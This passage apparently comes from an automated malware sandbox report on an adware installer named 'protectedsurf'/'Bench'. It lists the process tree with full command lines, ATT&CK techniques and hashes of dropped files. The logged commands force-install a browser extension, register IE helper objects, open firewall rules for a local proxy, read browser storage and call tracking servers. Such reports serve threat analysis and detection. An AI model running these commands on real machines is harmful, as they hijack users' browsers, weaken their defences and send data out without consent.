"C:\Windows\system32\cscript.exe" //Nologo "migrate.js" /iversion=20141023 /programfiles="C:\Program Files (x86)" /localapps="C:\Users\Admin\AppData\Local" /chrome-dir="" /firefox-dir="C:\Users\Admin\AppData\Local\protectedsurf\firefox" /ie-dir="C:\Program Files (x86)\protectedsurf" /product-name="protectedsurf" /installation-time="1669338547" /pid="2027" /zone="7114365" /czoneid="" /nmhost-dir="C:\Program Files (x86)\Bench\NmHost" /app-id="38991" /updateip="54.235.90.58" /version="1.0" /straoi="" /enable-extensions /enable-incognito /chrome-id="palhdiakifnjfamgjhknifndhdmhkkap" /chrome-update-url="http://palhdiakifnjfamgjhknifndhdmhkkap/check/.eJwNiUkOgCAMAP_SMzF65TOmkWJL2QJoTIx_l9ssLwzsChYObiURGLipdSl5pm1Zp0vuA2OkBna0iwzQM3Zx81eM7ARVfA4e0xlY82THLrEqVvh-3PshJg.FaCAANFWFab0R3qWEsdrxsOY9HE" /close-chrome /close-firefox /close-ie
2⤵
- Suspicious use of WriteProcessMemory
PID:4920

C:\Users\Admin\AppData\Local\protectedsurf\SoftwareDetector.exe
SoftwareDetector.exe
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Maps connected drives based on registry
PID:1412

C:\Users\Admin\AppData\Local\protectedsurf\sqlite3.exe
"C:\Users\Admin\AppData\Local\protectedsurf\sqlite3.exe" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_palhdiakifnjfamgjhknifndhdmhkkap_0.localstorage" "SELECT value FROM ItemTable WHERE key='_GPL_zoneid';"
3⤵
- Executes dropped EXE
PID:516

C:\Users\Admin\AppData\Local\protectedsurf\sqlite3.exe
"C:\Users\Admin\AppData\Local\protectedsurf\sqlite3.exe" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\vybwayxr.Admin\framework-f0b7380a-85d9-50c6-97ad-85d373c7aa0f.sqlite" "SELECT value FROM user_storage WHERE key='_GPL_zoneid';"
3⤵
- Executes dropped EXE
PID:4240

C:\Users\Admin\AppData\Local\protectedsurf\storageedit.exe
storageedit.exe ie {9CAE7395-64C7-465D-BE3D-4235878F1332} get _GPL_zoneid
3⤵
- Executes dropped EXE
PID:4660

C:\Windows\SysWOW64\net.exe
net.exe start schedule
2⤵
- Suspicious use of WriteProcessMemory
PID:224

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start schedule
3⤵
PID:2308

C:\Program Files (x86)\Bench\Updater\1.7.0.0\Updater.exe
"C:\Program Files (x86)\Bench\Updater\1.7.0.0\Updater.exe" -runmode=addsystask
2⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:3852

C:\Program Files (x86)\Bench\Updater\updater.exe
"C:\Program Files (x86)\Bench\Updater\updater.exe" -runmode=addtask
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3700

C:\Program Files (x86)\Bench\Updater\1.7.0.0\updater.exe
"C:\Program Files (x86)\Bench\Updater\1.7.0.0\updater.exe" -runmode=addtask
3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:3708

C:\Program Files (x86)\Bench\Updater\updater.exe
"C:\Program Files (x86)\Bench\Updater\updater.exe" -runmode=addproduct -info="C:\Users\Admin\AppData\Local\Temp\nsa20E9.tmp"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4524

C:\Program Files (x86)\Bench\Updater\1.7.0.0\updater.exe
"C:\Program Files (x86)\Bench\Updater\1.7.0.0\updater.exe" -runmode=addproduct -info="C:\Users\Admin\AppData\Local\Temp\nsa20E9.tmp"
3⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2276

C:\Windows\SysWOW64\cscript.exe
"C:\Windows\system32\cscript.exe" //Nologo "main_installer.js" install /product-name="protectedsurf" /installation-time="1669338547" /pid="2027" /zone="7114365" /czoneid="12199" /nmhost-dir="C:\Program Files (x86)\Bench\NmHost" /app-id="38991" /updateip="54.235.90.58" /version="1.0" /straoi="" /enable-extensions /enable-incognito /chrome-id="palhdiakifnjfamgjhknifndhdmhkkap" /chrome-update-url="http://palhdiakifnjfamgjhknifndhdmhkkap/check/.eJwNiUkOgCAMAP_SMzF65TOmkWJL2QJoTIx_l9ssLwzsChYObiURGLipdSl5pm1Zp0vuA2OkBna0iwzQM3Zx81eM7ARVfA4e0xlY82THLrEqVvh-3PshJg.FaCAANFWFab0R3qWEsdrxsOY9HE" /close-chrome /close-firefox /close-ie
2⤵
- Suspicious use of WriteProcessMemory
PID:1152

C:\Users\Admin\AppData\Local\protectedsurf\SoftwareDetector.exe
SoftwareDetector.exe
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Maps connected drives based on registry
PID:4440

C:\Windows\SysWOW64\cscript.exe
"C:\Windows\system32\cscript.exe" //Nologo "installer.js" install chrome "" /product-name="protectedsurf" /installation-time="1669338547" /pid="2027" /zone="7114365" /czoneid="12199" /nmhost-dir="C:\Program Files (x86)\Bench\NmHost" /app-id="38991" /updateip="54.235.90.58" /version="1.0" /straoi="" /enable-extensions /enable-incognito /chrome-id="palhdiakifnjfamgjhknifndhdmhkkap" /chrome-update-url="http://palhdiakifnjfamgjhknifndhdmhkkap/check/.eJwNiUkOgCAMAP_SMzF65TOmkWJL2QJoTIx_l9ssLwzsChYObiURGLipdSl5pm1Zp0vuA2OkBna0iwzQM3Zx81eM7ARVfA4e0xlY82THLrEqVvh-3PshJg.FaCAANFWFab0R3qWEsdrxsOY9HE" /close-chrome /close-firefox /close-ie
2⤵
- Drops file in Drivers directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1228

C:\Users\Admin\AppData\Local\protectedsurf\SoftwareDetector.exe
SoftwareDetector.exe
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Maps connected drives based on registry
PID:2936

C:\Users\Admin\AppData\Local\protectedsurf\gpedit.exe
gpedit.exe chrome add-extension palhdiakifnjfamgjhknifndhdmhkkap http://palhdiakifnjfamgjhknifndhdmhkkap/check/.eJwNiUkOgCAMAP_SMzF65TOmkWJL2QJoTIx_l9ssLwzsChYObiURGLipdSl5pm1Zp0vuA2OkBna0iwzQM3Zx81eM7ARVfA4e0xlY82THLrEqVvh-3PshJg.FaCAANFWFab0R3qWEsdrxsOY9HE
3⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4400

C:\Windows\SysWOW64\cscript.exe
"C:\Windows\system32\cscript.exe" //Nologo "chrome_gp_update.js" /product-name="protectedsurf" /installation-time="1669338547" /pid="2027" /zone="7114365" /czoneid="12199" /nmhost-dir="C:\Program Files (x86)\Bench\NmHost" /app-id="38991" /updateip="54.235.90.58" /version="1.0" /straoi="" /enable-extensions /enable-incognito /chrome-id="palhdiakifnjfamgjhknifndhdmhkkap" /chrome-update-url="http://palhdiakifnjfamgjhknifndhdmhkkap/check/.eJwNiUkOgCAMAP_SMzF65TOmkWJL2QJoTIx_l9ssLwzsChYObiURGLipdSl5pm1Zp0vuA2OkBna0iwzQM3Zx81eM7ARVfA4e0xlY82THLrEqVvh-3PshJg.FaCAANFWFab0R3qWEsdrxsOY9HE" /close-chrome /close-firefox /close-ie
2⤵
PID:1652

C:\Program Files (x86)\Bench\BService\1.1\bservice.exe
"C:\Program Files (x86)\Bench\BService\1.1\bservice.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:4412

C:\Program Files (x86)\Bench\BService\1.1\bservice64.exe
"C:\Program Files (x86)\Bench\BService\1.1\bservice64.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:1708

C:\Program Files (x86)\Bench\Wd\wd.exe
"C:\Program Files (x86)\Bench\Wd\wd.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2764

C:\Windows\SysWOW64\cscript.exe
"C:\Windows\system32\cscript.exe" //Nologo "installer.js" install firefox "C:\Users\Admin\AppData\Local\protectedsurf\firefox\" /product-name="protectedsurf" /installation-time="1669338547" /pid="2027" /zone="7114365" /czoneid="12199" /nmhost-dir="C:\Program Files (x86)\Bench\NmHost" /app-id="38991" /updateip="54.235.90.58" /version="1.0" /straoi="" /enable-extensions /enable-incognito /chrome-id="palhdiakifnjfamgjhknifndhdmhkkap" /chrome-update-url="http://palhdiakifnjfamgjhknifndhdmhkkap/check/.eJwNiUkOgCAMAP_SMzF65TOmkWJL2QJoTIx_l9ssLwzsChYObiURGLipdSl5pm1Zp0vuA2OkBna0iwzQM3Zx81eM7ARVfA4e0xlY82THLrEqVvh-3PshJg.FaCAANFWFab0R3qWEsdrxsOY9HE" /close-chrome /close-firefox /close-ie
2⤵
- Loads dropped DLL
PID:4316

C:\Windows\SysWOW64\cscript.exe
"C:\Windows\system32\cscript.exe" //Nologo "installer.js" install ie "C:\Program Files (x86)\protectedsurf\" /product-name="protectedsurf" /installation-time="1669338547" /pid="2027" /zone="7114365" /czoneid="12199" /nmhost-dir="C:\Program Files (x86)\Bench\NmHost" /app-id="38991" /updateip="54.235.90.58" /version="1.0" /straoi="" /enable-extensions /enable-incognito /chrome-id="palhdiakifnjfamgjhknifndhdmhkkap" /chrome-update-url="http://palhdiakifnjfamgjhknifndhdmhkkap/check/.eJwNiUkOgCAMAP_SMzF65TOmkWJL2QJoTIx_l9ssLwzsChYObiURGLipdSl5pm1Zp0vuA2OkBna0iwzQM3Zx81eM7ARVfA4e0xlY82THLrEqVvh-3PshJg.FaCAANFWFab0R3qWEsdrxsOY9HE" /close-chrome /close-firefox /close-ie
2⤵
- Loads dropped DLL
- Drops file in Program Files directory
- System policy modification
PID:5032

C:\Users\Admin\AppData\Local\protectedsurf\SoftwareDetector.exe
SoftwareDetector.exe
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Maps connected drives based on registry
PID:2052

C:\Program Files (x86)\protectedsurf\FrameworkEngine.exe
"C:\Program Files (x86)\protectedsurf\FrameworkEngine.exe" /RegServer
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies Internet Explorer settings
- Modifies registry class
PID:1968

C:\Windows\SysWOW64\regsvr32.exe
regsvr32.exe /s "C:\Program Files (x86)\protectedsurf\FrameworkBHO.dll"
3⤵
- Loads dropped DLL
- Installs/modifies Browser Helper Object
- Modifies Internet Explorer settings
- Modifies registry class
PID:1836

C:\Windows\SysWOW64\regsvr32.exe
regsvr32.exe /s "C:\Program Files (x86)\protectedsurf\FrameworkBHO64.dll"
3⤵
- Loads dropped DLL
PID:1752

C:\Windows\system32\regsvr32.exe
/s "C:\Program Files (x86)\protectedsurf\FrameworkBHO64.dll"
4⤵
- Registers COM server for autorun
- Loads dropped DLL
- Installs/modifies Browser Helper Object
- Modifies Internet Explorer settings
- Modifies registry class
PID:1632

C:\Windows\SysWOW64\regsvr32.exe
regsvr32.exe /s "C:\Program Files (x86)\protectedsurf\RequestHelper.dll"
3⤵
- Loads dropped DLL
PID:1480

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="proc.exe" protocol=TCP dir=in localip=127.0.0.1 remoteip=127.0.0.1 localport=3128 action=allow program="C:\Program Files (x86)\Bench\Proxy\proc.exe"
2⤵
- Modifies Windows Firewall
- Loads dropped DLL
PID:4708

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="pwdg.exe" protocol=TCP dir=in localip=127.0.0.1 remoteip=127.0.0.1 localport=3128 action=allow program="C:\Program Files (x86)\Bench\Proxy\pwdg.exe"
2⤵
- Modifies Windows Firewall
- Loads dropped DLL
PID:744

C:\Program Files (x86)\Bench\Proxy\pwdg.exe
"C:\Program Files (x86)\Bench\Proxy\pwdg.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5048

C:\Program Files (x86)\Bench\Proxy\proc.exe
"C:\Program Files (x86)\Bench\Proxy\proc.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4876

C:\Program Files (x86)\Bench\Updater\updater.exe
"C:\Program Files (x86)\Bench\Updater\updater.exe" -runmode=addtask
2⤵
- Executes dropped EXE
PID:4332

C:\Program Files (x86)\Bench\Updater\1.7.0.0\updater.exe
"C:\Program Files (x86)\Bench\Updater\1.7.0.0\updater.exe" -runmode=addtask
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:516

C:\Program Files (x86)\Bench\Updater\updater.exe
"C:\Program Files (x86)\Bench\Updater\updater.exe" -runmode=addproduct -info="C:\Users\Admin\AppData\Local\protectedsurf\info.xml"
2⤵
- Executes dropped EXE
PID:3600

C:\Program Files (x86)\Bench\Updater\1.7.0.0\updater.exe
"C:\Program Files (x86)\Bench\Updater\1.7.0.0\updater.exe" -runmode=addproduct -info="C:\Users\Admin\AppData\Local\protectedsurf\info.xml"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:316

C:\Windows\SysWOW64\cscript.exe
"C:\Windows\system32\cscript.exe" //Nologo "ping.js" "http://www.installping5.info/tbi-ping/b2d30cb54a6319e0f028c35ff0441b68/783c77e05498ce500056c842042b599e/xriderexe/7114365/?pid=38991&sub_id=default&uzid=7114365&subid=&pid=2027" "" ""
2⤵
- Loads dropped DLL
PID:1844

C:\Windows\SysWOW64\cscript.exe
"C:\Windows\system32\cscript.exe" //Nologo "ping.js" "http://www.installping5.info/id-check/b2d30cb54a6319e0f028c35ff0441b68/" "C:\Users\Admin\AppData\Local\Temp\nseF979.tmp\get.dat" ""
2⤵
- Loads dropped DLL
PID:1744

C:\Windows\SysWOW64\cscript.exe
"C:\Windows\system32\cscript.exe" //Nologo "ping.js" "http://www.installping5.info/newuser-ping/b2d30cb54a6319e0f028c35ff0441b68/783c77e05498ce500056c842042b599e/0/xriderexe/7114365/0/?pid=38991&sub_id=default&uzid=7114365&subid=&pid=2027&os=8.1&admin=1" "" ""
2⤵
- Loads dropped DLL
PID:4420

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:972

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:5084

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Browser Extensions

T1176

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Software Discovery

T1518

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Bench\BService\1.1\bhelper.dll
Filesize
52KB

MD5
72b1a3d56f812839ae5ba3420a5ed812

SHA1
0fadb783c6c38284e5819bcaded2a1c50503f7af

SHA256
cc54e42139a9f01777833c5fbe9e545e008c74b6fa0abbc37d6d29d9976098be

SHA512
5bca01f36822e4345c792e9a65cb9823bed6ab8e7406906e089731c464056b9330dee014a968a5b4c069e72f682cf8167b131e6cc5cdb5478eb36aef6994b2b8

Download Submit
C:\Program Files (x86)\Bench\BService\1.1\bhelper.dll
Filesize
52KB

MD5
72b1a3d56f812839ae5ba3420a5ed812

SHA1
0fadb783c6c38284e5819bcaded2a1c50503f7af

SHA256
cc54e42139a9f01777833c5fbe9e545e008c74b6fa0abbc37d6d29d9976098be

SHA512
5bca01f36822e4345c792e9a65cb9823bed6ab8e7406906e089731c464056b9330dee014a968a5b4c069e72f682cf8167b131e6cc5cdb5478eb36aef6994b2b8

Download Submit
C:\Program Files (x86)\Bench\BService\1.1\bhelper64.dll
Filesize
108KB

MD5
1ee6f52ca4a576a5a21f11bc91634fa1

SHA1
cc88403e0541a0f8ab9ebc3beb4eef27132cee1d

SHA256
eee40028b8d3074cdd8c44714c04ee514578fddc21bcad9fb35624b4ab3e7865

SHA512
1295e08d0cc43c6297ede90aff02f75783939dfe39b6a93de0a701de2e2c84325e6b17374e4adcdf975579935c2cbd6ba39c840ec2bbe2e0bb5908921298d106

Download Submit
C:\Program Files (x86)\Bench\BService\1.1\bhelper64.dll
Filesize
108KB

MD5
1ee6f52ca4a576a5a21f11bc91634fa1

SHA1
cc88403e0541a0f8ab9ebc3beb4eef27132cee1d

SHA256
eee40028b8d3074cdd8c44714c04ee514578fddc21bcad9fb35624b4ab3e7865

SHA512
1295e08d0cc43c6297ede90aff02f75783939dfe39b6a93de0a701de2e2c84325e6b17374e4adcdf975579935c2cbd6ba39c840ec2bbe2e0bb5908921298d106

Download Submit
C:\Program Files (x86)\Bench\BService\1.1\bservice.exe
Filesize
51KB

MD5
a7bea13873210cdfccb51f54c2799a83

SHA1
ccfcd73f208f834c854e46e6f31db11aada5cf08

SHA256
e5f5765909b57d992640fb4a48815b0b4e84588b98eef61423dc77e8dc1afa26

SHA512
435a16fda6cc3b9e5087e3747a262e05341f89a96529eea182875ca86f23fd23f21a0759973c3f08a8114f2cd2fd589401f3188f08481730deb06fac8d5d00fe

Download Submit
C:\Program Files (x86)\Bench\BService\1.1\bservice.exe
Filesize
51KB

MD5
a7bea13873210cdfccb51f54c2799a83

SHA1
ccfcd73f208f834c854e46e6f31db11aada5cf08

SHA256
e5f5765909b57d992640fb4a48815b0b4e84588b98eef61423dc77e8dc1afa26

SHA512
435a16fda6cc3b9e5087e3747a262e05341f89a96529eea182875ca86f23fd23f21a0759973c3f08a8114f2cd2fd589401f3188f08481730deb06fac8d5d00fe

Download Submit
C:\Program Files (x86)\Bench\BService\1.1\bservice64.exe
Filesize
108KB

MD5
f51d7d7a34492a032c2eee93a53308f3

SHA1
c9976887ba98e303142d710b450957c5c8ae0d3f

SHA256
9b4f14184ad6291b9f919214d973b747b26118a4ffc6dcac5fbdd1309b45379c

SHA512
66490aad7a4aab96cd62e8ec7638e1e9de43cb277ec840fd4106ff4b1053ed077e4d4d450ff2890fe3c6cd29051fb98f2d206ca73f50bcb0c80271c80f54e7d5

Download Submit
C:\Program Files (x86)\Bench\BService\1.1\bservice64.exe
Filesize
108KB

MD5
f51d7d7a34492a032c2eee93a53308f3

SHA1
c9976887ba98e303142d710b450957c5c8ae0d3f

SHA256
9b4f14184ad6291b9f919214d973b747b26118a4ffc6dcac5fbdd1309b45379c

SHA512
66490aad7a4aab96cd62e8ec7638e1e9de43cb277ec840fd4106ff4b1053ed077e4d4d450ff2890fe3c6cd29051fb98f2d206ca73f50bcb0c80271c80f54e7d5

Download Submit
C:\Program Files (x86)\Bench\NmHost\manifest.json
Filesize
221B

MD5
a88a5c36a39e517cd6606eb59bd5c462

SHA1
6bfe7b8d96e8f09c672057375dad9d40bf60b98a

SHA256
e476626b33e414fdbf5a0429dfdcdf516cbecb6289ea05ff14a2f1f704def543

SHA512
93278ade40f1d296c1f1bf03731cdd33f33bedb531454b7d11a3a746566975bef05df944ca183ee2fe72e5476eb19107d7ab097a447fa323a5070e681196c8c3

Download Submit
C:\Program Files (x86)\Bench\Updater\1.7.0.0\Updater.exe
Filesize
363KB

MD5
fa3604b8da1416662d3a0eceeb38476b

SHA1
fc416a610cdd50eb3bb2e23a1245fcc748c22162

SHA256
0c3e827cf4da900b9d3f8e48fca64575f573b9fe2f2dce82b4795929d3013df9

SHA512
9544228712ec8a6487e2875da2b7a56ebbe1b2f7cc7c0c0b741b97a82e191ec40f3aeeeed8b11716ff81c30b4b70493c95a45e18274ba7444c13070db9c119df

Download Submit
C:\Program Files (x86)\Bench\Updater\1.7.0.0\updater.exe
Filesize
363KB

MD5
fa3604b8da1416662d3a0eceeb38476b

SHA1
fc416a610cdd50eb3bb2e23a1245fcc748c22162

SHA256
0c3e827cf4da900b9d3f8e48fca64575f573b9fe2f2dce82b4795929d3013df9

SHA512
9544228712ec8a6487e2875da2b7a56ebbe1b2f7cc7c0c0b741b97a82e191ec40f3aeeeed8b11716ff81c30b4b70493c95a45e18274ba7444c13070db9c119df

Download Submit
C:\Program Files (x86)\Bench\Updater\1.7.0.0\updater.exe
Filesize
363KB

MD5
fa3604b8da1416662d3a0eceeb38476b

SHA1
fc416a610cdd50eb3bb2e23a1245fcc748c22162

SHA256
0c3e827cf4da900b9d3f8e48fca64575f573b9fe2f2dce82b4795929d3013df9

SHA512
9544228712ec8a6487e2875da2b7a56ebbe1b2f7cc7c0c0b741b97a82e191ec40f3aeeeed8b11716ff81c30b4b70493c95a45e18274ba7444c13070db9c119df

Download Submit
C:\Program Files (x86)\Bench\Updater\1.7.0.0\updater.exe
Filesize
363KB

MD5
fa3604b8da1416662d3a0eceeb38476b

SHA1
fc416a610cdd50eb3bb2e23a1245fcc748c22162

SHA256
0c3e827cf4da900b9d3f8e48fca64575f573b9fe2f2dce82b4795929d3013df9

SHA512
9544228712ec8a6487e2875da2b7a56ebbe1b2f7cc7c0c0b741b97a82e191ec40f3aeeeed8b11716ff81c30b4b70493c95a45e18274ba7444c13070db9c119df

Download Submit
C:\Program Files (x86)\Bench\Updater\updater.exe
Filesize
70KB

MD5
158ea53d1c77e8d3ce592f55f4bf38dc

SHA1
4829a71560afa9aafe840dafcf4a275d575eac6a

SHA256
9078c4f9b220c887fce151b71086aa38d31d58a9fcb1c15547c000b2426f8d8f

SHA512
c61ccce9052a1a28add8a224618faf50a5dc6dfd9429bfab5547a4d40d0b04c31d8119c44d1e77343d61b8633f8cef3313134e981ea279ebc6a8bda1bb7157ca

Download Submit
C:\Program Files (x86)\Bench\Updater\updater.exe
Filesize
70KB

MD5
158ea53d1c77e8d3ce592f55f4bf38dc

SHA1
4829a71560afa9aafe840dafcf4a275d575eac6a

SHA256
9078c4f9b220c887fce151b71086aa38d31d58a9fcb1c15547c000b2426f8d8f

SHA512
c61ccce9052a1a28add8a224618faf50a5dc6dfd9429bfab5547a4d40d0b04c31d8119c44d1e77343d61b8633f8cef3313134e981ea279ebc6a8bda1bb7157ca

Download Submit
C:\Program Files (x86)\Bench\Updater\updater.exe
Filesize
70KB

MD5
158ea53d1c77e8d3ce592f55f4bf38dc

SHA1
4829a71560afa9aafe840dafcf4a275d575eac6a

SHA256
9078c4f9b220c887fce151b71086aa38d31d58a9fcb1c15547c000b2426f8d8f

SHA512
c61ccce9052a1a28add8a224618faf50a5dc6dfd9429bfab5547a4d40d0b04c31d8119c44d1e77343d61b8633f8cef3313134e981ea279ebc6a8bda1bb7157ca

Download Submit
C:\Program Files (x86)\Bench\Wd\wd.exe
Filesize
90KB

MD5
506bb43c05afe64fd3d5034d39c208be

SHA1
558b9f18f39f980bb52f023d2aefe3522591aae9

SHA256
5ab5c2450a621db03bd1f0b602adbfe1a73b4d27cb5b1d6ff5adcc026f3830c2

SHA512
1eba87a6ceb4d392a73003de9c0316551d7c0f26cb739dee0e3625f3f75563831a7b920909fe89c7e8f3afb54db16892f23d4182ec263e3c3768c0e23291a9bd

Download Submit
C:\Program Files (x86)\Bench\Wd\wd.exe
Filesize
90KB

MD5
506bb43c05afe64fd3d5034d39c208be

SHA1
558b9f18f39f980bb52f023d2aefe3522591aae9

SHA256
5ab5c2450a621db03bd1f0b602adbfe1a73b4d27cb5b1d6ff5adcc026f3830c2

SHA512
1eba87a6ceb4d392a73003de9c0316551d7c0f26cb739dee0e3625f3f75563831a7b920909fe89c7e8f3afb54db16892f23d4182ec263e3c3768c0e23291a9bd

Download Submit
C:\Program Files (x86)\protectedsurf\extension_info.json
Filesize
1KB

MD5
05b6eb0a8aee29f46b6a8647e7e62ded

SHA1
f5d71ca05715ed29526c01a73409e336e1e9f6dc

SHA256
6ca680fe6e679f665637eba74954840e11c5fc0d1f91209eb3c62090d3b43213

SHA512
b56df1f56584757fb6f999fd03dce2895ce78944f78741de70a20da4ffee909d31e4feb2f5383af4e220274fa0106bc1db84093de9c3091f2771bd0f046e7cce

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsa20E9.tmp
Filesize
328B

MD5
dc319c0badb088e49524b21ffe309fff

SHA1
cce86c789ebf0ad28ec1fa067ebee03d8f6a1bc5

SHA256
8aebf487a44350ba83fd49ba742d3edf75eec109125354233f5a570459a40c4e

SHA512
ab3a0f00b976f39d1235a0f20b9d75ea8e60c02e5b44f85adabaa432c04e5a2c56f6446aaee470014fc898d77a99cecb7ed247c66c68bf779de5b8b3a247e78a

Download Submit
C:\Users\Admin\AppData\Local\Temp\nseF979.tmp\System.dll
Filesize
11KB

MD5
c17103ae9072a06da581dec998343fc1

SHA1
b72148c6bdfaada8b8c3f950e610ee7cf1da1f8d

SHA256
dc58d8ad81cacb0c1ed72e33bff8f23ea40b5252b5bb55d393a0903e6819ae2f

SHA512
d32a71aaef18e993f28096d536e41c4d016850721b31171513ce28bbd805a54fd290b7c3e9d935f72e676a1acfb4f0dcc89d95040a0dd29f2b6975855c18986f

Download Submit
C:\Users\Admin\AppData\Local\Temp\nseF979.tmp\md5dll.dll
Filesize
6KB

MD5
0745ff646f5af1f1cdd784c06f40fce9

SHA1
bf7eba06020d7154ce4e35f696bec6e6c966287f

SHA256
fbed2f1160469f42ce97c33ad558201b2b43e3020257f9b2259e3ce295317a70

SHA512
8d31627c719e788b5d0f5f34d4cb175989eaa35aa3335c98f2ba7902c8ae01b23de3ccb9c6eb95945f0b08ef74d456f9f22ca7539df303e1df3f6a7e67b358da

Download Submit
C:\Users\Admin\AppData\Local\Temp\nseF979.tmp\md5dll.dll
Filesize
6KB

MD5
0745ff646f5af1f1cdd784c06f40fce9

SHA1
bf7eba06020d7154ce4e35f696bec6e6c966287f

SHA256
fbed2f1160469f42ce97c33ad558201b2b43e3020257f9b2259e3ce295317a70

SHA512
8d31627c719e788b5d0f5f34d4cb175989eaa35aa3335c98f2ba7902c8ae01b23de3ccb9c6eb95945f0b08ef74d456f9f22ca7539df303e1df3f6a7e67b358da

Download Submit
C:\Users\Admin\AppData\Local\Temp\nseF979.tmp\md5dll.dll
Filesize
6KB

MD5
0745ff646f5af1f1cdd784c06f40fce9

SHA1
bf7eba06020d7154ce4e35f696bec6e6c966287f

SHA256
fbed2f1160469f42ce97c33ad558201b2b43e3020257f9b2259e3ce295317a70

SHA512
8d31627c719e788b5d0f5f34d4cb175989eaa35aa3335c98f2ba7902c8ae01b23de3ccb9c6eb95945f0b08ef74d456f9f22ca7539df303e1df3f6a7e67b358da

Download Submit
C:\Users\Admin\AppData\Local\Temp\nseF979.tmp\md5dll.dll
Filesize
6KB

MD5
0745ff646f5af1f1cdd784c06f40fce9

SHA1
bf7eba06020d7154ce4e35f696bec6e6c966287f

SHA256
fbed2f1160469f42ce97c33ad558201b2b43e3020257f9b2259e3ce295317a70

SHA512
8d31627c719e788b5d0f5f34d4cb175989eaa35aa3335c98f2ba7902c8ae01b23de3ccb9c6eb95945f0b08ef74d456f9f22ca7539df303e1df3f6a7e67b358da

Download Submit
C:\Users\Admin\AppData\Local\Temp\nseF979.tmp\nsExec.dll
Filesize
6KB

MD5
acc2b699edfea5bf5aae45aba3a41e96

SHA1
d2accf4d494e43ceb2cff69abe4dd17147d29cc2

SHA256
168a974eaa3f588d759db3f47c1a9fdc3494ba1fa1a73a84e5e3b2a4d58abd7e

SHA512
e29ea10ada98c71a18273b04f44f385b120d4e8473e441ce5748cfa44a23648814f2656f429b85440157988c88de776c6ac008dc38bf09cbb746c230a46c69fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\nseF979.tmp\nsExec.dll
Filesize
6KB

MD5
acc2b699edfea5bf5aae45aba3a41e96

SHA1
d2accf4d494e43ceb2cff69abe4dd17147d29cc2

SHA256
168a974eaa3f588d759db3f47c1a9fdc3494ba1fa1a73a84e5e3b2a4d58abd7e

SHA512
e29ea10ada98c71a18273b04f44f385b120d4e8473e441ce5748cfa44a23648814f2656f429b85440157988c88de776c6ac008dc38bf09cbb746c230a46c69fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\nseF979.tmp\nsExec.dll
Filesize
6KB

MD5
acc2b699edfea5bf5aae45aba3a41e96

SHA1
d2accf4d494e43ceb2cff69abe4dd17147d29cc2

SHA256
168a974eaa3f588d759db3f47c1a9fdc3494ba1fa1a73a84e5e3b2a4d58abd7e

SHA512
e29ea10ada98c71a18273b04f44f385b120d4e8473e441ce5748cfa44a23648814f2656f429b85440157988c88de776c6ac008dc38bf09cbb746c230a46c69fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\nseF979.tmp\nsExec.dll
Filesize
6KB

MD5
acc2b699edfea5bf5aae45aba3a41e96

SHA1
d2accf4d494e43ceb2cff69abe4dd17147d29cc2

SHA256
168a974eaa3f588d759db3f47c1a9fdc3494ba1fa1a73a84e5e3b2a4d58abd7e

SHA512
e29ea10ada98c71a18273b04f44f385b120d4e8473e441ce5748cfa44a23648814f2656f429b85440157988c88de776c6ac008dc38bf09cbb746c230a46c69fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\nseF979.tmp\nsExec.dll
Filesize
6KB

MD5
acc2b699edfea5bf5aae45aba3a41e96

SHA1
d2accf4d494e43ceb2cff69abe4dd17147d29cc2

SHA256
168a974eaa3f588d759db3f47c1a9fdc3494ba1fa1a73a84e5e3b2a4d58abd7e

SHA512
e29ea10ada98c71a18273b04f44f385b120d4e8473e441ce5748cfa44a23648814f2656f429b85440157988c88de776c6ac008dc38bf09cbb746c230a46c69fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\nseF979.tmp\nsExec.dll
Filesize
6KB

MD5
acc2b699edfea5bf5aae45aba3a41e96

SHA1
d2accf4d494e43ceb2cff69abe4dd17147d29cc2

SHA256
168a974eaa3f588d759db3f47c1a9fdc3494ba1fa1a73a84e5e3b2a4d58abd7e

SHA512
